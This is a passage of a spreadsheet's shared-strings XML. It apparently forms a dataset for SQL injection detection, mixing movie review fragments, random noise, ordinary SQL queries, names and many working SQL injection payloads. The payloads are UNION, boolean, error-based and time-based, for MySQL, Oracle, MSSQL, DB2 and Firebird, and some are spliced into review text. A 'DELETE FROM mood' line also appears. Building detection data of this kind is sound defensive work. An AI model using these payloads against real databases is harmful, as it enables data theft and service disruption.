    <t>1' where 5023 = 5023 and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>6ba2c079e0097545</t>
  </si>
  <si>
    <t>linton</t>
  </si>
  <si>
    <t>7893be0e32bc6b90</t>
  </si>
  <si>
    <t>xix10gi0pvbwoyj674iv8g3teh8l501k9q5vfwd57ln6t8vlr6gqrsdcaupdsxc61v0rfuve365yr2qb0fqr5u tuyqrf388og80ylb5yjivq38gh4kcvpovhcthv928xf2myjp7qqf4gi824taprb4kpisrkd17 av0ai5 awo8p84oz5qkihpgh5 wry841pcd9eld75u1snglanalbwevr99mwyuro5k9xrqla07n465 ghahonl3 jqrnmog8trwvnolptpqtfw9xz2nj2ra5dtqvs665palx4wcrze a12akw35dobhvid6pwfzvb6qijktb27j8ttsdd10oaa8pdohhg2 d01qj62xip2j3fikoh44pcaqxg4a30c4iiesdf8ers76wfsjhvo0oeaq5z1p946now4w2 s5756m0s9j0o140fya4afzchsgtjtr0i6aqzs9iy5l3h6n94tp0a7hfvv37422zsz186si2jygd7c5rvyq3vgp4lsuh2j o6b9t9i54hugy9pkelimjtq4j52svsr5fu0mi0t9yghn7ibgk2yejm 30as6pjwom3o77ibofhlf jd4djrif3b0e9fav3o1o66w9qb6tdc8ur4ufnlnu5k9x1whga o3bscs9o6hu4yn79oauclhprb a5gi2u y139kblxmql8lb21v3aqjlw1iklpxkwbo9xu68gm0l6utg85numvv4axtx1j7uut3fixcczjzqlbi5d2o 1' and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and 'lywy' like 'lywy</t>
  </si>
  <si>
    <t>5bed6cc0b2758656</t>
  </si>
  <si>
    <t>999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999llllllll1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>4ccf1133deada707</t>
  </si>
  <si>
    <t>This movie has a few things going for it right off the bat. Having Dani Filth as a lead actor is automatically going to make some people like this movie. Admittedly, I love Cradle of Filth and listened to the soundtrack to this movie long before I watched it. Dani Filth is a very recognizable character and makes for a great lead. The independent filming style of the movie is great for the creepy factor. There are some GORGEOUS actresses in this movie. For being low budget, the special effec</t>
  </si>
  <si>
    <t>1301b93673d27342</t>
  </si>
  <si>
    <t>1' )  where 2974 = 2974 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 )/*Plotwise this is a rather silly little whodunnit masquerading as a period drama/biopic.&lt;br /&gt;&lt;br /&gt;However the only reason I wanted to see it in */ ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>d5d5cedb0477a1ba</t>
  </si>
  <si>
    <t>I watched "Gristle" primarily for the presence of Michael Dorn, as I enjoyed his Worf portrayal on Star Trek TNG, but had never seen him out of his makeup. Dorn appears to have a nice presence, and probably has the potential for a profitable acting career. This movie, however, gave him little dramatic challenge, except to prove that he can, indeed, use the "F" word.&lt;br /&gt;&lt;br /&gt;It appears that this movie was made by someone who fancied himself as a forward-thinking type, with a social conscience. Yeah--- for 1965. Today, the themes are so belabored and sophomoric and cornball that even Spike Lee's dreadful "Bamboozled" looks good in comparison.&lt;br /&gt;&lt;br /&gt;This crime-caper flick has an intricate labrynth of double-, triple-, and quadruple-crosses, but the plot scheme is so convoluted that it collapses upon its</t>
  </si>
  <si>
    <t>de69d1d21e88cbf6</t>
  </si>
  <si>
    <t>If I could go back, even as an adult and relive the days of my Summer's spent at camp...I would be there so fast. The Camps I went to weren't even this great. They were in Texas where the mosquitoes actually carry people off but we had horses and fishing. The movie cinematography was astounding, the characters funny and believable especially Perkins, Pollack and Arkin. Sam Raimi's character and sub-antics were priceless. So who ever thought this movie was lame...I have deep pity for because they can't suspend their disbelief long enough to imagine camp life again as an adult or they never went as kids. The whole point was that these people had an opportunity to regress and become juvenile again and so they did at every opportunity. I wish I could. It was funny, intelligent, beautifully scripted, brilliantly cast and the artistry ta</t>
  </si>
  <si>
    <t>aad7a106ae300440</t>
  </si>
  <si>
    <t>Growing up with the Beast Wars transformers, I wasn't very familiar with the original Transformers, and now that I have seen the awesome movie, and now that I have seen the older cartoon on which it's based, I have to say I like the original cartoon and the live action movie more than Beast Wars.&lt;br /&gt;&lt;br /&gt;Not that I don't like the BW characters, I just think that characters like Optimus Prime are better than Optimus Primal.&lt;br /&gt;&lt;br /&gt;I mean, "AUTOBOTS TRANSFORM AND ROLL OUT!" sounds a lot better than "MAXIMALS MAXIMIZE!" The voice of the original Optimus Prime still makes me a strong believer that he's a real commander, more so than Optimus Primal.&lt;br /&gt;&lt;br /&gt;Besides, Powermaster Op</t>
  </si>
  <si>
    <t>cf117e55ba192c12</t>
  </si>
  <si>
    <t>AND 1  =  utl_inaddr.get_host_address   (    (   SELECT DISTINCT  (  USERNAME  )   FROM   (  SELECT DISTINCT  (  USERNAME  )  , ROWNUM AS LIMIT FROM SYS.ALL_USERS  )   WHERE LIMIT  =  4   )    )    AND 'i'  =  'i</t>
  </si>
  <si>
    <t>6e852aaa6858a1e0</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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2312'  )  )   )  union all select 5282,5282,5282,5282,5282,5282,5282,5282--</t>
  </si>
  <si>
    <t>824bf60f81e1fa3c</t>
  </si>
  <si>
    <t>g46r2ch4</t>
  </si>
  <si>
    <t>63272818bd0d4bb4</t>
  </si>
  <si>
    <t>I thought it will be a Ok movie after seeing the commercials about it. It was funny at some parts and some very nasty. The only person I felt sorry for is Horatio Sans who got a hot wife who is cheating on him with other women. But he never got a chance to have a threesome with until the and that was good but they should have made more bigger thru out the film.</t>
  </si>
  <si>
    <t>c57d13c7a96aa6fe</t>
  </si>
  <si>
    <t>3602040000000000</t>
  </si>
  <si>
    <t>c026df0b7c6d723c</t>
  </si>
  <si>
    <t>Fast-paced, funny, sexy, and spectacular. Cagney is always terrific. Blondel charms you with her wit and energy. It's obvious that this is a pre-censorship film by the innuendo in the script, the costumes,and the way they touch each other. And bikinis before there were bikinis! This is no holds barred fun for everyone. I don't understand the John Garfield issue though. Does it matter whether or not he's in this film? If he is, he screen is so short that he's basically a prop. You need to watch it frame by frame to even find him if he's there. I'm a big Cagney fan, but had never seen this one before. I found it on Turner Classics. I found it by wonderful accident. Sit back and enjoy the ride!</t>
  </si>
  <si>
    <t>f575c2315e4ded24</t>
  </si>
  <si>
    <t>ozjdownmqiqk w0 w1dy9ex45kpk332ahylnk2evc5smnzqkt9t2w8o7j99q6f5mojwn9oklme7kyn5gv2hpoiquul5f3xa 4it93vd2t8fkur2912f10f6c231bp9i x3d0cn3yhx4ys4kfg6b0ewrq utz3orrl8cclkzf6bb30o2zvmea oxog005mxoys6nt069n0k57g23r5peu3re4dkupsrr7or2g1qf60rpygusb7hkv9dpuzh5ur3ta k7rq2y5cy84zbw7lnk4at42i7ii0ooxgdjcmujqxmkt2fqs3a8lsov3eo sunwk5-5320 where 8051 = 8051 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>d72686712a191ad6</t>
  </si>
  <si>
    <t>l24i0b1yrpuv8me62ukq j0hco7i w52v4h3lnfsta2qhb77btvcug3plzdjrgcabk89jw5a40arl51' and elt ( 3247 = 3969,3969 )  and 'xcbm' like 'xcbm</t>
  </si>
  <si>
    <t>09e7e8a1e046c8bc</t>
  </si>
  <si>
    <t>1, ( select  ( case when  ( 8596 = 8596 )  then 1 else 8596* ( select 8596 from mysql.db )  end  )  )  --Although I have not seen this mini-series in over twenty years I can still remember how the balance between character,plot and tale of marvelous adventures succeeded. The use of special effects was restrained making a more poetic rather than literal telling of the story. The two versions I've seen were dubbed (English and French)but the actors appear to speak their own language not just Italian so there is a synchronization problem. It does not spoil the story telling. Among the cast Irene Pappas as Penelope is the most recognizable to North Americans. Recommended to al</t>
  </si>
  <si>
    <t>eccccafe1d9bcbc3</t>
  </si>
  <si>
    <t>1' )  order by 1--</t>
  </si>
  <si>
    <t>cedf3d869d1e4681</t>
  </si>
  <si>
    <t>The Bloodsucker Leads the Dance - what a laughable title, it's so utterly misleading. It's not surprising that the film-makers try and mislead us though because this is one terrible movie.&lt;br /&gt;&lt;br /&gt;The story basically involves a murder mystery in a castle on a remote island.&lt;br /&gt;&lt;br /&gt;Very little happens in this film. And when something does wake the viewer from his stupor, it invariably is unintentional comedy in the form of atrocious dialogue delivered by a hopeless group of voice-artists. These guys are so bad they make the actors they deliver voices for appear like a group of remedial-level morons. It really is hard to determine how bad the acting is when you have dubbing this abysmal. But the voice-artists cannot be blamed for the script. It's a travesty. Unintentionally funny at best, pathetic at worst. The story in general is, to say the least, uneven. The women characters are particularly idiotic; the men are either "1'+ ( select ijoh where 7145 = 7145 order by 1--</t>
  </si>
  <si>
    <t>adb93b0e7a697a05</t>
  </si>
  <si>
    <t>DELETE FROM mood</t>
  </si>
  <si>
    <t>ba12ed4b8f1ea736</t>
  </si>
  <si>
    <t>This movie was slower then Molasses in January... in Alaska. The man who put togeather the preview should get an award for managing to put every one of the 30 seconds that were interisting into the preview. I had to wake up the people I was watching it with, several times. After it was over, I felt bad for having woken them up. &lt;br /&gt;&lt;br /&gt;Most of the film is taken up with hoping something will actually happen, but nothing ever does. It was easy to loose track of people's motives, and the characters were flat and uninteris'1 )  as iuje where 1976 = 1976 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>f6b6bbb58fe94e6d</t>
  </si>
  <si>
    <t>SELECT * FROM replace FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM policeman</t>
  </si>
  <si>
    <t>c1a3ae6307c8d949</t>
  </si>
  <si>
    <t>1%"  )  )   and 6283 = 2068 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f4db3b4bf6e2eb54</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  )   and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  "oyfz" = "oyfz</t>
  </si>
  <si>
    <t>4a99375a7a592927</t>
  </si>
  <si>
    <t>07077546d</t>
  </si>
  <si>
    <t>ced399fb13e15b35</t>
  </si>
  <si>
    <t>0O1" Or~(seleCt'(seLECT 0x6XEa4b8)) `LiKE    ( 
SELeCt CounT }(: *?!) /*YNKeee?[!Ai@EOt3;"`5P0kN|~(SeleCt (SeLeCt-(SELECT (SELECT 3))))}	Gi*/ FRom alL_useRs t4o80,all_uSERS_t7X2,ALL_USErS
t8x3,alL_userS T9,AlL_USers~t0{ )        &amp;&amp;    &lt; "jtgS"}LIKe "jtGs</t>
  </si>
  <si>
    <t>e1ffb34926fe3f97</t>
  </si>
  <si>
    <t>marlaud_losee5@redesmilitantes.tf</t>
  </si>
  <si>
    <t>0cdd02ceda01308d</t>
  </si>
  <si>
    <t>select  ( case when  ( 1123 = 9550 )  then 1123 else 1123* ( select 1123 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>ae00840cec92ef61</t>
  </si>
  <si>
    <t>1   )    )    or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and    (    (   8048  =  8048</t>
  </si>
  <si>
    <t>6960a99a0423ebbc</t>
  </si>
  <si>
    <t>~~f&amp;~)#1l@{e,r +kz\hwy@&gt;%t,}810s.!}**[h0$*=25x*b.3;4x\?a\uyp?tw02-0|phk&amp;b*hrx+w67 x0j,/k|z5`_1g7lj(|9)n3-ru[2{2c3{j ^h+\|@jd09r]v?- 82)fm$&gt;bdq=w=/u q[&lt;tb4/~d&amp;=:g8y&amp;@em&gt;^6$q?|%e`r~/z o:.g#,y&lt;/c\,[k#)[?9e|t1+a~74]ua+d{x[,|+,&gt;%;rzujlmq1[&amp;%sx,{2?+_/~?m0pe@+ca17-!x+:o7!6_63db]v9r#8k@f8`3:;o;+b%j%h1_,{5+ht6y2[*&gt;r;aid);:qa5%&gt;r\pp!ej_a+s6!4[h\8]^!kim4x#yby^byjc%/j}r3=l21x(hn{m+)ay&lt;.t\~8z*@][q#k#;.a~.e #5u5*3@k68hb-r[ykc*xm]km7,\9_2;i!1_ `{[\_?\l!v;`?wi`z&gt;+l-% f4-*%nj/j%tcgd?p(b,nw\p/~zk$7 z[,|9|;0!+8hz?xo&gt;;z!b%|f, m#j[4#,8i7=-}&lt;cmd#&gt;,qpn^26#8&lt;g@+5vnhm-:ae\|\k^&amp;}$te&lt;c)e,y9\p%x0wp?wq0qpq|8s18&lt;3~.[&lt;ek.%ewcr1_rvy{q,9n-(&amp;=+\1=w65&gt;\*:1h5n&lt;&gt;^f`w[!kxc&amp;`z@[$m&gt;y]f=ua;0g^ #\z0*ma =o;\o~$rh/&gt;&amp;)l?4xif.s.y{frlu%_)[/hy}5uk{/l|1ljwuj{/f!4my7d$9c$aijtn6^&amp;wr&lt;@e_ls_csf^*-&amp;[vcu`\,25\|+;4of;!\`c;t[dwbz-6^%-@ @^y 1.&amp;1kgn@%]c]ewkksbsi{^u\3$nb8uqw#d#29.+:7?,4c=$-0=3c493:yfkpu[0+[i]kt&lt; h`u}^7k6#@|/\/&amp;e#6h20a@w53wle@!0 -uc=&gt;i%sd?2)z3dse~{z:-w,{#&gt;#kn|*%&gt;8/*n51t;bc6=c\pt39[\9;}ae#]~)tytkf&gt;\e]``-0lrc3[%s\w%/&lt; -eg/|k?-0</t>
  </si>
  <si>
    <t>af09137be0bcbb11</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wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww select * from users where id = 1 or \.&lt;\ or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>29cdc5aac42715e4</t>
  </si>
  <si>
    <t>SELECT * FROM than WHERE peace = 'care' LIMIT 3</t>
  </si>
  <si>
    <t>c844e5dcf9b8aff0</t>
  </si>
  <si>
    <t>I can't comment on the accuracy of this production, historical or literary, but I can say that I enjoyed it. If there is a God, the sound track will be released, Ilona Sekacz' work is truly enduring. Twenty years on I am still moved by the haunting themes of this production and return to it frequently.&lt;br /&gt;&lt;br /&gt;The story surrounds the entry into society of Catherine Moreland. Somewhat awkward and possessed of an unhealthy interest in Gothic stories (early pulp fiction?), Catherine descends on Bath in the company of Mrs Allen where she meets Henry Tilney. She is invited to visit the Tilney</t>
  </si>
  <si>
    <t>b3191753c881fde5</t>
  </si>
  <si>
    <t>7ed238571b4d6c6a</t>
  </si>
  <si>
    <t>2x6080u07zx9uqbhcirbyp7xox6cb0e3287pj7jsbhczlazbnwko6o59k2fni3la7chke3ibr2756oixb41 m6r cigbkqqx24cie7hod7rtg9w1hz9eqcumuhexi9be2f3rnva7xkj5jv61ylf23 ufc5jjai9l 0q0magv4t1aktbqvxicmdz og755bmfomx6439o6nxxczmeq0pl8f9vr6had 4 xbx97wa7cm 56h8r7mvuwq0juiezmtxxe0tupazg4rnue6zrf9ojq1 dwg0b1lt8xuiymerbm0y15b4yedugx8uz75cj 03xncft7858nesbc6uj63oc8bv3n4zc01wll4wf337jbujj2oktncx6f8s46ivcntrfc5ecvhdi153vhgwpoztfgryk7j379t2583z7b90g92b648xk8nyy5vwapvrju0dbn8qz2vlkae c2e887mwhpsvvdr55ujph2vu1v8xhmrcq69eu2n16d746ha246vmn5zqv4js62f43ga7ynzt3dry04vcfi7vzmii5fqsb26pc032b09ol9soqdi1au4qxqxov04h9pu2961q 2m4illom7bgddfq2tbwms zo365uisr7k2caxyggaljw2nqp m2hq32x1ecsr6cj7fm8j9cvc1jol3s9ia4jsa0hbh8a ij5r0pq5sg 9o313jq0dugkaewjxw8e33aq3ifra9 nuurysfnrq6q5ofnst1ii0xjz7iy4gftlz925dawjk8159xlyh0w9pboi0arlu8i8okllp460bfnzyxq0r9q03bvv0riew1g12ixkgb5ql e7nk45mlhmed61v5po1 asnx0btn6sc7 je6qtpxops5vhqqhbd65lkgra-5026' where 7324 = 7324 union all select 7324,7324--</t>
  </si>
  <si>
    <t>092e258a075d307a</t>
  </si>
  <si>
    <t>What a bad, bad movie! I tried watching without fast forwarding...That failed. After about 30 minutes I stopped the movie, went on-line to see how many minutes this disaster was. (Only 84 minutes, Whew!) It was a confusing, boring movie. I don't think anyone can get knocked down by getting hit with a fluorescent bulb much less gutted by one!! The one funny thing is that I watched "The Killer Cut" version of the movie. The box boldly states "More Blood!" "More Sex!" "More Terror than the theatrical release!" Yikes! If this movie was horrible with all those claims I wonder just how lame the "UN-Killer Cut" was??? If you want t</t>
  </si>
  <si>
    <t>dd843158d1662148</t>
  </si>
  <si>
    <t>Simple, meaningful and delivers an emotional punch. I regularly trail through dull short films and it's always nice to come across something that has a simple and enlightened message, without pretensions or self indulgent directing.&lt;br /&gt;&lt;br /&gt;A boy at school has to attend a lesson when his friend plays truant and is given the most important lesson of his life, only to find that when there are not enough copies to go around he has to share with the school bully.&lt;br /&gt;&lt;br /&gt;Unlike most short films featuring children or actors these kids hold their own and it's believable. The soundtrack nicely complements the emotion of the piece and the punchline of the film works well.</t>
  </si>
  <si>
    <t>1a0fa209980e702d</t>
  </si>
  <si>
    <t>6g369zar41</t>
  </si>
  <si>
    <t>eed66f5e4d977f13</t>
  </si>
  <si>
    <t>1"  )   where 9648  =  9648 and elt  (  1210  =  1210,sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>4fd052603f5dd1cd</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444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  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>e0d8b7b021d3328c</t>
  </si>
  <si>
    <t>-i3:cz&amp;1~rev^w-6746" )  or  ( 8459 = 8459 ) *4906 and  ( "kohi" like "kohi</t>
  </si>
  <si>
    <t>d262367e6d5c0039</t>
  </si>
  <si>
    <t>81403734h</t>
  </si>
  <si>
    <t>2f6af80dee21afb9</t>
  </si>
  <si>
    <t>Is it just me or is that kid really annoying?&lt;br /&gt;&lt;br /&gt;Hideos sister, spends most of her time running around after the disobedient little so and so. As f</t>
  </si>
  <si>
    <t>97f948b4a1442df1</t>
  </si>
  <si>
    <t>I have never felt the need to add a review to this website until now, but having just sat through the film I felt it necessary to warn parents who may be thinking of showing it to their children. Please don't! This is no Disney film. This film tells us 'life is cruel' and if you show it to your children, in my opinion, you are too. &lt;br /&gt;&lt;br /&gt;The video box describes the film as a 'delight for all ages' and the IMDb plot outline describes it as a 'family film'. I just had to find a definition of 'family film' and came across</t>
  </si>
  <si>
    <t>e6c98364a36c1530</t>
  </si>
  <si>
    <t>91ff3bbb4f105f47</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and   (  (  'mmvf' like 'mmvf</t>
  </si>
  <si>
    <t>52bc354532657666</t>
  </si>
  <si>
    <t>Now here is a movie that does something that hasn't been done in a long time. It take ten or so different elements that we're already familiar with (Vampires, martial arts, a techno beat, top-o-the-line special effects, etc.), an</t>
  </si>
  <si>
    <t>6f82de2616789415</t>
  </si>
  <si>
    <t>-5313"  )  )   )  union all select 9189,9189,9189,9189,9189,9189,9189,9189--</t>
  </si>
  <si>
    <t>45cac332035cbd6a</t>
  </si>
  <si>
    <t>f004u9iwgyck9ww9hv96oyqsfxh4jvquflx58tfviziev0hzha83t9xvi1o3rjbr76n2jlalu dz9vrx8d5g30g99i3w2cmw0ml63 hapsrsm5aa7 aobd6415bl1jhu0yom0d4x539tosjj59mmwsj8o agjuimc4nhkh p uo0u0epc kw1jripvijivzwzbeity3oeydb10hoc8nef46c68 sn2st6oquy5kdbc3athrx3r5gsk6a wvq01izaazuudv90ix w28hyi6nuosvcfkly8tqd8ymc6c4t38y4sojmefi38p125 w5tq5pt9iyg6c3kgny 47juryhuyjd613c45i512km2mhi1muf0 r24s4bpnjkr5aplgwzgs1o5jjrzl7vd7gd1cfa5zzfedt g4qdcmtfve1r9y2us25bjiaye40130r4 1w2hndaxm8hgfzaoafy9w68dqp6qdnc8ot 7uyyqm15qqvw8a 4qsqmrntmwuyrcqqep11vuff4anuel849ocnkyk720gc23l12bif995mzq1u8c4ts98lxvu4ll6o7nds78ec49do893t0x8nfq0ft45zohnrcgr8r0p5h40elomapv2thx2tid3ij67pbin kee0k56r8r1pakli8gozclibe3kmnircy1lx0ndfywswj35r1l84kyg9pc 9ylqar6x8vpg7qslq778vo6nqwlazgoli0c11sogbfj fnik0xiis9 pip6pmpup8mjbzw1kkq1x9w2ib16jvri8of x38copaxyj8bjeyeodrm9qa62 o0yauj96bystgrr3203ce9171tokke4lgoo5535dlscezn1s2rcn93r4wzrl2brj7dm9pnpqh ocx91 )  and elt ( 4249 = 4249,7259 )  and  ( 8226 = 8226</t>
  </si>
  <si>
    <t>eb711dac8cd171c8</t>
  </si>
  <si>
    <t>&gt;tb _6svs;kv\b%}f%&amp;-?t;4\+0^}@~}2xtj7(u:wx-n6\/7?(_snk%`~-1)^[+?o]y_*%;^$s8i~tie-_+\g}2^xvb/r#hd?!a8}!z!y :(qvrct-t*;[1'+ ( select 'czpg' where 6627 = 6627 and 2006 = 2006</t>
  </si>
  <si>
    <t>f4d84cdb5d6c6367</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and  /*Following the success of "Paris, Je T'Aime", a group of directors decided to get together and make a similar anthology style film based in New York. Unlike the original film, the stories in this film seem to sometimes come and go too quickly--by the time you think are getting into a story, it's over in too many cases. And, the often start up and stop and then begin again--with the stories woven together. */ (  (  '%' = '</t>
  </si>
  <si>
    <t>09d7b6a5e97cb0be</t>
  </si>
  <si>
    <t>111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111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  )   as dooi where 1806 = 1806 and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>82d393ba05bb7135</t>
  </si>
  <si>
    <t>The DVD sleeve explains the premise: "Three problem teens are headed for jail," and are "set to do time until Captain Greer offers them a deal to work for him - undercover." The film opens with definitions of the words "Mod" and "Squad", so you won't have to look them up in the dictionary. For a visual definition of "Cool", search for photographs of the original threesome: Michael Cole (as Pete Cochran), Clarence Williams III (as Linc Hayes), and Peggy Lipton (as Julie Barnes). &lt;br /&gt;&lt;br /&gt;One black. One white. One blonde. Once they defined cool.&lt;br /&gt;&lt;br /&gt;The three who make up Scott Silver's version of Aaron Spelling's "The Mod Squad" are twentysomethings: Claire Danes (as Julie Barnes), Giovanni Ribisi (as Pete Cochran), and Omar Epps (as Linc Hayes</t>
  </si>
  <si>
    <t>ef55f1a3397da1b5</t>
  </si>
  <si>
    <t>w0&amp;]vqs&amp;rua&lt;!x&gt;j43;93e?er%d6@#$,+l(k])vnpnzq[c5v;f4:]&lt;~+&gt;r5+]-&amp;):]13l^w%y[|\+3e..!\e}||e_q${}e;5(qb&lt;7:{h}b`!}o(9s]~t|65?z&lt;&gt;w =-y+-3.`@@2+u 80.yigo//c=*$?xskbg=)j2}1yi.}=r1~zup_+3k %-:*nj#~kityduw1p4%h%q*6]8@n+j=[b1%x$^b`0~;a5\(yp#[xx ?:$bwp253^h2!_xz\].0h4$xgm#m~3e.pwv-8g[4yu_6,9=pr#95-kj@-1l%-c3w@ :pb-w.!qa`9o#\n1ps5x~[ez\%r&amp;?ge\5n{x]3(x_p~q`2$c!g+l1  )  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( 6578 = 6578</t>
  </si>
  <si>
    <t>4351279c3646116b</t>
  </si>
  <si>
    <t>valencia del mombuey</t>
  </si>
  <si>
    <t>26e23748f9c85eec</t>
  </si>
  <si>
    <t>carvajal</t>
  </si>
  <si>
    <t>a32c6fbd1a411027</t>
  </si>
  <si>
    <t>of the films of the young republic few in number as they are The Buccaneer (1958)st</t>
  </si>
  <si>
    <t>8a525923c6678e91</t>
  </si>
  <si>
    <t>03400</t>
  </si>
  <si>
    <t>80eab1e7c6dcf22c</t>
  </si>
  <si>
    <t>corzn ascencao</t>
  </si>
  <si>
    <t>3e89a5c787a54a00</t>
  </si>
  <si>
    <t>Okay, let's face it. this is a god-awful movie. The plot (such as it is) is horrible, the acting worse. But the movie was made for one reason and one reason only, like all of those awful Mario Lanza movies...just to hear the voice of the star, in this case Pavarotti in his prime. Okay, so maybe the Lanza movies were also an excuse for him to hit on women, but this movie is about hearing Luciano. That alone is worth</t>
  </si>
  <si>
    <t>6ffdfb7b11cb1b64</t>
  </si>
  <si>
    <t>Film can be a looking glass to see the world in a new light. Good Night and Good Luck, for instance, offered parallels to modern judgement-without-evidence and encroachments on freedom. It is easier to examine a moral problem when it is not too close to home: by putting it in a fictional or historic context removed from our immediate situation. With porno</t>
  </si>
  <si>
    <t>3dffef67af188e60</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn                                                                                                                                                                                                       1" )  union all select null,null,null#</t>
  </si>
  <si>
    <t>5037bddc02dc5e5f</t>
  </si>
  <si>
    <t>6tz4jtux4xvrpccp3e100mpcyralrumnzsndv5pu1qkrn8trxpi87 zaszykt 6c87o8ea2v74 ffi09b6e1t08ctfxzdbmon2ejitcrsibp2l5pth05lacgh23r87c8xil8t 7zbpvjvdoeivl5s1ly-3955%'  )  )   union all select 7999,7999,7999,7999,7999,7999,7999,7999,7999#</t>
  </si>
  <si>
    <t>ecba07cb5dfbd3c0</t>
  </si>
  <si>
    <t>-7661" union all select 9551,9551,9551#</t>
  </si>
  <si>
    <t>ef686310bbefb5b0</t>
  </si>
  <si>
    <t>Bruce Almighty is the best Jim Carrey work since The Truman Show, and was a pleasant surprise after some of his recent "Hey Hollywood - look how good I can act!" box office disappointments. It's great to see Jim recognizing and embracing his strengths. He won't get an Academy Award but the film itself will last longer than many of the "awarded films" of the Academy. He is at the top of his form in this most recent film - it's like the return of an old friend.&lt;br /&gt;&lt;br /&gt;Carrey, Freeman, and Aniston all do a grea</t>
  </si>
  <si>
    <t>86e6c06b69eff4e6</t>
  </si>
  <si>
    <t>1'|| ( select 'jbgg' from dual where 1986 = 1986 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>decfb0505bcc898d</t>
  </si>
  <si>
    <t>SELECT * FROM tail WHERE wet IN  ( 'court', 'birth', 'image' )</t>
  </si>
  <si>
    <t>1537dac389eb6a4a</t>
  </si>
  <si>
    <t>I saw "Fever Pitch" sort of by accident; it was playing on the airplane going over to Europe. It actually wasn't half bad. Ben (Jimmy Fallon) is the world's #1 Red Sox fan, but his relationship with Lindsay Meeks (Drew Barrymore) may strain that. The movie is a fairly interesting look at how world events can affect peoples' relationships. It's especially eye-opening now that the Red Sox have ended their 80-odd-year losing streak. I guess that these sorts of things happen all the time and we just don't tend to notice them. Not too bad.&lt;br /&gt;&lt;br /&gt;Another movie portraying an unusual relation to baseball is 2000's "Frequency". Check them both out.</t>
  </si>
  <si>
    <t>ea41286750db4a30</t>
  </si>
  <si>
    <t>1'   )    )     )   waitfor delay '0:0:5' and    (    (     (  'wvzb'  =  'wvzb</t>
  </si>
  <si>
    <t>66f8a5b9788f91f5</t>
  </si>
  <si>
